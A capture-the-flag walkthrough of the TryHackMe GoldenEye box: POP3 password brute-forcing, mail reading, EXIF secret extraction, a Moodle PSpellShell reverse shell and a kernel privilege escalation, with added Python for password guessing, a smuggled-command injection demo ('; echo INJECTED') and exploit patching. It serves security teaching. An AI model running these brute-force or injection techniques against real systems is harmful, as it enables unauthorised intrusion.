TryHackMe-GoldenEye
NMAP
Nmap scan report for 10.10.81.165
Host is up (0.15s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open ssl/unknown
|_ssl-date: TLS randomness does not represent time
55007/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE TOP CAPA PIPELINING USER UIDL RESP-CODES SASL(PLAIN) STLS
|_ssl-date: TLS randomness does not represent time
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 502.67 seconds
PORT 80
Looking at the source code
The HTML source contains an encoded string. Pasting it into CyberChef and running the Magic operation decodes it to
InvincibleHack3
which is given as the password for boris.
But these creds did not work, so let's enumerate the other ports.
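The following is an added example, not part of the original writeup and not CyberChef's code: it reproduces what the Magic operation does on a small scale by trying a few common decoders, chained up to two steps, and keeping every chain that yields readable text. SAMPLE is a constructed HTML-entity encoding of the password recovered above, not the exact string from the page.

```python
"""Try common decodings on a blob, chaining up to two steps, the way
CyberChef's Magic operation guesses an encoding. Added example, not from
the writeup or CyberChef; SAMPLE is a constructed HTML-entity encoding of
the password the page recovers, not the exact string from the page."""
import base64
import binascii
import html
import string
import urllib.parse

PRINTABLE = set(string.printable) - set("\x0b\x0c")
SAMPLE = ("&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;"
          "&#72;&#97;&#99;&#107;&#51;")


def _base64(s):
    # validate=True so that ordinary text is not silently accepted as base64
    return base64.b64decode(s, validate=True).decode("ascii")


def _hex(s):
    return binascii.unhexlify(s.strip()).decode("ascii")


DECODERS = [
    ("html-entities", html.unescape),
    ("url", urllib.parse.unquote),
    ("base64", _base64),
    ("hex", _hex),
]


def looks_readable(s):
    """Non-empty printable ASCII only; anything else is treated as a miss."""
    return bool(s) and all(c in PRINTABLE for c in s)


def magic(data, depth=2):
    """Return [(chain, text)] for every decoder chain of up to `depth` steps
    that turns `data` into readable text different from its input."""
    hits = []

    def walk(current, chain):
        if len(chain) >= depth:
            return
        for name, fn in DECODERS:
            try:
                out = fn(current)
            except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
                continue
            if out == current or not looks_readable(out):
                continue
            hits.append((chain + [name], out))
            walk(out, chain + [name])

    walk(data, [])
    return hits


if __name__ == "__main__":
    for chain, text in magic(SAMPLE):
        print(" -> ".join(chain), ":", text)
```

The strict base64 decoder matters: without validate=True, plain words are often "decoded" into garbage, which is exactly the noise a readability check is there to suppress.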
PORT 55007 (POP3)
I tried to brute-force boris's password but failed.
Earlier, in the source code of the web page, we saw a message that "Natalya could break your code", so that is a potential username we should brute-force, again using hydra.
After some time I was able to get the correct password.
I also got boris's password with the fasttrack wordlist.
Boris's Mail
Here we used telnet to connect to the POP3 service and logged in with boris's credentials. We can see that there are 3 messages.
Message 1
Message 2
Message 3
Natalya's Mail
We do the same with natalya's mailbox.
Message 1
Message 2
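As an added example covering both steps above (the hydra brute force against port 55007 and the telnet session that reads the mailboxes), here is the same POP3 exchange in Python, not code from the writeup. A stub POP3 server is embedded so the script runs offline; the account, password and mail bodies in MAILBOXES are constructed for the demo and are not the ones on the box.

```python
"""POP3 password guessing (hydra's job on port 55007) and mailbox download
(the telnet session), with an embedded stub server so it runs offline.
Added example, not from the writeup; accounts, passwords and mail bodies
below are constructed and are not the ones on the box."""
import poplib
import socketserver
import threading

MAILBOXES = {  # constructed demo data
    "boris": {
        "password": "not-the-real-one",
        "messages": [
            b"From: root@ubuntu\r\nSubject: test\r\n\r\nmail server up",
            b"From: natalya@ubuntu\r\nSubject: hint\r\n\r\n.. leading dots get stuffed",
        ],
    },
}


class StubPOP3Handler(socketserver.StreamRequestHandler):
    """Just enough of RFC 1939 to serve USER/PASS, STAT, RETR and QUIT."""

    def send(self, line):
        self.wfile.write(line.encode() + b"\r\n")

    def handle(self):
        user, authed = None, False
        self.send("+OK Dovecot ready.")
        while True:
            raw = self.rfile.readline()
            if not raw:
                return
            cmd, _, arg = raw.decode(errors="replace").strip().partition(" ")
            cmd, box = cmd.upper(), MAILBOXES.get(user or "", {})
            if cmd == "USER":
                user, authed = arg, False
                self.send("+OK")
            elif cmd == "PASS":
                authed = bool(box) and box["password"] == arg
                self.send("+OK Logged in." if authed else "-ERR [AUTH] Authentication failed.")
            elif cmd == "STAT" and authed:
                msgs = box["messages"]
                self.send(f"+OK {len(msgs)} {sum(map(len, msgs))}")
            elif cmd == "RETR" and authed and arg.isdigit() and 0 < int(arg) <= len(box["messages"]):
                body = box["messages"][int(arg) - 1]
                # RFC 1939 byte-stuffing: a line starting with '.' gets an extra '.'
                lines = [b"." + ln if ln.startswith(b".") else ln for ln in body.split(b"\r\n")]
                self.wfile.write(b"+OK\r\n" + b"\r\n".join(lines) + b"\r\n.\r\n")
            elif cmd == "QUIT":
                self.send("+OK Bye")
                return
            else:
                self.send("-ERR unknown command or not authenticated")


def start_stub_server():
    """Start the stub on an ephemeral loopback port; returns (server, port)."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), StubPOP3Handler)
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def guess_password(host, port, user, candidates, timeout=5):
    """Try each candidate on a fresh connection; return the first that logs in."""
    for pw in candidates:
        conn = poplib.POP3(host, port, timeout=timeout)
        try:
            conn.user(user)
            conn.pass_(pw)              # raises error_proto on a -ERR reply
            return pw
        except poplib.error_proto:
            continue
        finally:
            try:
                conn.quit()
            except (poplib.error_proto, OSError):
                pass
    return None


def fetch_messages(host, port, user, password, timeout=5):
    """Log in and return every message (RETR 1..N) as text."""
    conn = poplib.POP3(host, port, timeout=timeout)
    try:
        conn.user(user)
        conn.pass_(password)
        count, _size = conn.stat()
        return [b"\n".join(conn.retr(i)[1]).decode(errors="replace") for i in range(1, count + 1)]
    finally:
        conn.quit()


if __name__ == "__main__":
    server, port = start_stub_server()
    pw = guess_password("127.0.0.1", port, "boris", ["123456", "password", "not-the-real-one"])
    print("password:", pw)
    for n, msg in enumerate(fetch_messages("127.0.0.1", port, "boris", pw), 1):
        print(f"--- Message {n} ---\n{msg}")
    server.shutdown()
```

Against a real Dovecot you would point guess_password at the target and port 55007 with a wordlist; note that it opens one connection per attempt, as hydra does, so expect it to be slow and noisy in the server logs.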
In the mail we find credentials for xenia and a domain name, so let's add the domain to the /etc/hosts file.
Navigate to severnaya-station.com/gnocertdir and log in with xenia's credentials.
Under the user's messages we find a conversation with a user named doak.
We find doak's POP3 password with the same procedure.
Doak's Mail
Message
Log in as dr_doak on the website.
Logged in as dr_doak, we find a text file containing this message:
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
Running exiftool on the image reveals a base64-encoded string in its metadata; decoding it gives the admin password.
Now we are logged in as admin. One thing we can do now is look for exploits for Moodle.
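To show what exiftool is reading here, the following added example (not from the writeup, and not exiftool's code) walks a JPEG's marker segments, pulls the two places people most often hide a note (the COM segment and the EXIF ImageDescription tag in IFD0) and tries base64 on each. The JPEG is constructed in code and the secret inside it is a placeholder, not the credential from the box.

```python
"""Walk a JPEG's metadata segments, extract comment/description text and
try base64 on it. Added example, not from the writeup or exiftool; the
sample JPEG is constructed and its secret is a placeholder."""
import base64
import binascii
import struct

EXIF_IMAGE_DESCRIPTION = 0x010E


def jpeg_segments(data):
    """Yield (marker, payload) for every marker segment up to the scan data."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xD9:                               # EOI
            return
        if 0xD0 <= marker <= 0xD8 or marker == 0x01:     # standalone markers, no length
            pos += 2
            continue
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        yield marker, data[pos + 4:pos + 2 + length]
        if marker == 0xDA:                               # SOS: entropy-coded data follows
            return
        pos += 2 + length


def exif_strings(app1):
    """Return {tag: text} for ASCII-typed tags in IFD0 of an Exif APP1 payload."""
    if not app1.startswith(b"Exif\x00\x00"):
        return {}
    tiff = app1[6:]
    endian = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if endian is None or struct.unpack(endian + "H", tiff[2:4])[0] != 42:
        return {}
    ifd = struct.unpack(endian + "I", tiff[4:8])[0]
    count = struct.unpack(endian + "H", tiff[ifd:ifd + 2])[0]
    out = {}
    for i in range(count):
        tag, typ, n, val = struct.unpack(endian + "HHI4s", tiff[ifd + 2 + 12 * i:ifd + 14 + 12 * i])
        if typ != 2:                                     # 2 = ASCII
            continue
        if n <= 4:                                       # short values live in the entry itself
            raw = val[:n]
        else:                                            # otherwise val is an offset into the TIFF
            off = struct.unpack(endian + "I", val)[0]
            raw = tiff[off:off + n]
        out[tag] = raw.rstrip(b"\x00").decode("latin-1")
    return out


def try_base64(text):
    """Decoded text if `text` is strict base64 of printable ASCII, else None."""
    try:
        s = base64.b64decode(text.strip(), validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return s if s.isprintable() else None


def find_secrets(data):
    """Return (field, text, base64_decoded_or_None) for each text field found."""
    found = []
    for marker, payload in jpeg_segments(data):
        if marker == 0xFE:                               # COM segment
            found.append(("Comment", payload.decode("latin-1")))
        elif marker == 0xE1:                             # APP1, normally Exif
            desc = exif_strings(payload).get(EXIF_IMAGE_DESCRIPTION)
            if desc is not None:
                found.append(("ImageDescription", desc))
    return [(field, text, try_base64(text)) for field, text in found]


def build_sample_jpeg(description, comment):
    """Constructed, non-renderable JPEG: SOI, Exif APP1 with ImageDescription, COM, EOI."""
    desc = description.encode("latin-1") + b"\x00"
    string_offset = 8 + 2 + 12 + 4                       # header, count, one entry, next-IFD pointer
    tiff = b"II" + struct.pack("<HI", 42, 8) + struct.pack("<H", 1)
    tiff += struct.pack("<HHII", EXIF_IMAGE_DESCRIPTION, 2, len(desc), string_offset)
    tiff += struct.pack("<I", 0) + desc

    def seg(marker, payload):
        return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload

    return b"\xff\xd8" + seg(0xE1, b"Exif\x00\x00" + tiff) + seg(0xFE, comment.encode("latin-1")) + b"\xff\xd9"


if __name__ == "__main__":
    for field, text, decoded in find_secrets(build_sample_jpeg("ZXhhbXBsZS1zZWNyZXQ=", "looks innocent")):
        print(f"{field}: {text!r} -> {decoded!r}")
```

On a real file, call find_secrets(open("for-007.jpg", "rb").read()); the walker stops at the scan data, so it never touches the compressed pixels.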
Getting a reverse shell
For some reason the exploit wasn't working. I double-checked everything, but it still failed,
so I went with manual exploitation of Moodle:
Under Settings go to Plugins -> Text editors -> TinyMCE HTML editor and set the spell engine to PSpellShell.
Then create a blog post entry and click the spell-check icon; if you have set up your netcat listener you will get a shell from the target machine.
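The reason this works: the PSpellShell engine builds its aspell command line from the admin-configured aspell binary path and runs it through the system shell, so shell metacharacters in that setting execute whenever anyone triggers a spell-check. The following is an added example, not Moodle's code: the vulnerable builder mirrors that pattern in Python, the hardened version shows the fix (allow-listed binary, argv without a shell), and the demo runs a harmless echo rather than a reverse shell. ALLOWED_ASPELL and the temp file name are assumptions for the demo.

```python
"""Vulnerable vs hardened construction of a spell-checker command line.
Added example, not Moodle's code. ALLOWED_ASPELL and the file names are
demo assumptions; the payload is a harmless echo."""
import os
import subprocess
import tempfile

ALLOWED_ASPELL = ("/usr/bin/aspell", "/usr/local/bin/aspell")   # assumed allow-list


def vulnerable_command(aspell_path, lang, text_file):
    """Anti-pattern: interpolating configuration into a shell command string."""
    return f"{aspell_path} -a --lang={lang} < {text_file} 2>&1"


def run_vulnerable(aspell_path, lang, text_file):
    """Run it the way PHP's shell_exec()/popen() would: through /bin/sh."""
    proc = subprocess.run(vulnerable_command(aspell_path, lang, text_file),
                          shell=True, capture_output=True, text=True)
    return proc.stdout


def demo_injection():
    """Show the primitive with a harmless payload: the 'binary path' setting
    carries '; echo INJECTED', which the shell runs as a second command."""
    path = os.path.join(tempfile.gettempdir(), "pspell-demo.txt")
    with open(path, "w") as fh:
        fh.write("helo wrld\n")               # constructed text to 'spell-check'
    evil_path = "/nonexistent/aspell; echo INJECTED"
    return run_vulnerable(evil_path, "en", path)


def hardened_argv(aspell_path, lang):
    """Validate against an allow-list and build argv: no shell, no interpolation."""
    if aspell_path not in ALLOWED_ASPELL:
        raise ValueError(f"refusing unexpected aspell path: {aspell_path!r}")
    if not lang.replace("_", "").isalpha():
        raise ValueError(f"bad language code: {lang!r}")
    return [aspell_path, "-a", f"--lang={lang}"]


def is_rejected(aspell_path, lang):
    """True if the hardened builder refuses this configuration."""
    try:
        hardened_argv(aspell_path, lang)
    except ValueError:
        return True
    return False


def run_hardened(aspell_path, lang, text_file):
    """Feed the text on stdin and exec the validated argv directly (no shell)."""
    with open(text_file) as fh:
        proc = subprocess.run(hardened_argv(aspell_path, lang), stdin=fh,
                              capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    print("vulnerable output:", demo_injection().strip())
    print("hardened rejects injected path:", is_rejected("/usr/bin/aspell; echo INJECTED", "en"))
```

Quoting the path with shlex.quote would stop the metacharacters but would still let an administrator point the setting at any binary on the box; the allow-list plus a shell-free exec is the fix that removes the primitive entirely.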
Looking for the kernel version
This is a really old Linux kernel, so hopefully there will be an exploit for it on exploit-db.
Download, compile and transfer it to the target machine.
But running it gave an error because gcc was not installed on the machine.
On googling I found that cc is an alternative to gcc, and it was on the box,
so we edited the exploit, replacing gcc with cc, recompiled it and transferred it to the box again.
We got root!!
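The gcc-to-cc edit above is a recurring chore: many public kernel exploits shell out to gcc at runtime (for instance to build a helper shared object on the target), so they fail on a box without gcc even when you compiled them elsewhere. This added example (not from the writeup) finds a C compiler on the host and rewrites the embedded gcc invocations in an exploit source to use it. SAMPLE_SOURCE is a constructed stand-in showing the pattern, not a real exploit.

```python
"""Find a C compiler on the host and rewrite embedded `gcc` invocations in a
source file to use it. Added example, not from the writeup; SAMPLE_SOURCE is
a constructed stand-in, not an exploit."""
import re
import shutil

COMPILER_CANDIDATES = ("gcc", "cc", "clang", "tcc")

SAMPLE_SOURCE = r'''#include <stdlib.h>
int main(void) {
    /* helper library gets built on the target at runtime */
    return system("gcc -fPIC -shared -o /tmp/helper.so /tmp/helper.c -ldl -w");
}
'''


def find_c_compiler(candidates=COMPILER_CANDIDATES):
    """Return the first compiler name found on PATH, or None."""
    for name in candidates:
        if shutil.which(name):
            return name
    return None


def rewrite_compiler(source, new_compiler, old="gcc"):
    """Replace whole-word occurrences of `old` (e.g. inside system("gcc ...")) with
    `new_compiler`; returns (patched_source, number_of_replacements)."""
    return re.subn(r"\b" + re.escape(old) + r"\b", new_compiler, source)


def patch_file(path, new_compiler=None, old="gcc"):
    """Patch an exploit source in place, keeping a .orig copy; returns replacements."""
    compiler = new_compiler or find_c_compiler()
    if compiler is None:
        raise RuntimeError("no C compiler found on this host")
    with open(path) as fh:
        patched, n = rewrite_compiler(fh.read(), compiler, old)
    if n:
        shutil.copyfile(path, path + ".orig")
        with open(path, "w") as fh:
            fh.write(patched)
    return n


if __name__ == "__main__":
    print("compiler on this host:", find_c_compiler())
    patched, n = rewrite_compiler(SAMPLE_SOURCE, "cc")
    print(f"{n} replacement(s):\n{patched}")
```

The word-boundary match also rewrites a gcc mentioned in comments, which is harmless; check the diff against the .orig copy before compiling, since some exploits also pass gcc-specific flags that cc on the target may not accept.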